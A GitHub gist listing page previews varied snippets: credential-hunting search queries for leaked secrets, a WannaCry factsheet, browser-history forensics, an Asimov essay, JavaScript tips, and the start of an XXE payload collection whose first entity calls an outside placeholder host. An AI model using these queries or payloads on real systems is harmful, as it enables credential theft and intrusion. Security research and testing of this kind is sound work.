Skip to content

Instantly share code, notes, and snippets.

View jbinkleyj's full-sized avatar

John Binkley jbinkleyj

32 followers · 275 following
View GitHub Profile
@nullenc0de
nullenc0de / auto_git_query
Last active January 6, 2024 15:08
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@olejorgenb
olejorgenb / places-exploration.sql
Last active April 7, 2024 00:35
Firefox places.sqlite exploration (browser history)
--- Firefox places.sqlite exploration
-- https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
-- https://wiki.mozilla.org/images/d/d5/Places.sqlite.schema3.pdf
-- http://forensicswiki.org/wiki/Mozilla_Firefox_3_History_File_Format (probably somewhat outdated)
-- [select text -> right click -> search] does not set from_visit :(
-- Gotchas :angry-face: https://superuser.com/a/1405880/153095 (Explains why your history is incomplete)
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 10, 2024 11:03 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@Epivalent
Epivalent / Wannacrypt0r-FACTSHEET.md
Created May 12, 2017 20:17

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Malware samples

@mubix
mubix / infosec_newbie.md
Last active April 7, 2024 22:35
How to start in Infosec
@conspect
conspect / cult_of_ignorance.md
Last active January 22, 2024 10:33
A Cult Of Ignorance, Isaac Asimov

It's hard to quarrel with that ancient justification of the free press: "America's right to know." It seems almost cruel to ask, ingeniously, "America's right to know what, please? Science? Mathematics? Economics? Foreign languages?"

None of those things, of course. In fact, one might well suppose that the popular feeling is that Americans are a lot better off without any of that tripe.

There is a cult of ignorance in the United States, and there always has been. The strain of anti-intellectualism has been a constant thread winding its way throughout political and cultural life, nurtured by the false notion that democracy means that "my ignorance is just as good as your knowledge."

Politicians have routinely striven to speak the language of Shakespeare and Milton as ungrammaticaly as possible in order to avoid offending their audiences by appearing to have gone to school. Thus, Adlai Stevenson, who incautiously allowed intelligence and learning and wit to peep out of his speeches, found the American people

@atcuno
atcuno / gist:3425484ac5cce5298932
Last active March 25, 2024 13:55
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@nolanlawson
nolanlawson / protips.js
Last active February 4, 2024 18:06
Promise protips - stuff I wish I had known when I started with Promises
// Promise.all is good for executing many promises at once
Promise.all([
promise1,
promise2
]);
// Promise.resolve is good for wrapping synchronous code
Promise.resolve().then(function () {
if (somethingIsNotRight()) {
throw new Error("I will be rejected asynchronously!");
@staaldraad
staaldraad / XXE_payloads
Last active May 24, 2024 11:08
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>